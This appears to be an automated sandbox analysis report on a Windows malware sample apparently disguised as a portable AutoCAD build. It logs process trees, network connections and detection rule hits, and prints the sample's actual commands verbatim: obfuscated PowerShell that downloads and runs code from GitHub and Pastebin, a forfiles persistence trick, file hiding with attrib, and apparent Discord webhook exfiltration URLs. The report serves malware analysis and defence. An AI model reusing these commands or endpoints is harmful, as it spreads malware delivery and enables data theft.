Source: powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8387EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8387EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E8386F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 0000000B.00000002.3233396001.000001E838166000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8386C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8386C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E8386B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8386FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8386FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E8386D4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown | Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown | Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown | Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49763 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49856 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49869 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49868 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49905 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49916 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49943 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49984 version: TLS 1.2

System Summary

Source: amsi64_7328.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7368.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7328, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF31530
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF38B60
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF362B0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF379B0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF33AC0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF310E0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF35BF0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF32EF0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF37C00
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF33320
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF33430
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF68EF38C30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF88797C702
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF88797B956
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF887970FB5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF8879737E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF887971FF5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF887A48BAA
Source: amsi64_7328.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7368.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7328, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal88.troj.evad.winEXE@21/16@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnrk4m3e.eir.ps1
Source: OSLdZanXNc.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\OSLdZanXNc.exe "C:\Users\user\Desktop\OSLdZanXNc.exe"
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.4.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: OSLdZanXNc.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: OSLdZanXNc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb2 source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb source: OSLdZanXNc.exe
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb!F source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbt source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbX$ source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbIN source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb) source: OSLdZanXNc.exe
Source: Binary string: \??\C:\Windows\mscorlib.pdb[ source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb( source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbn source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
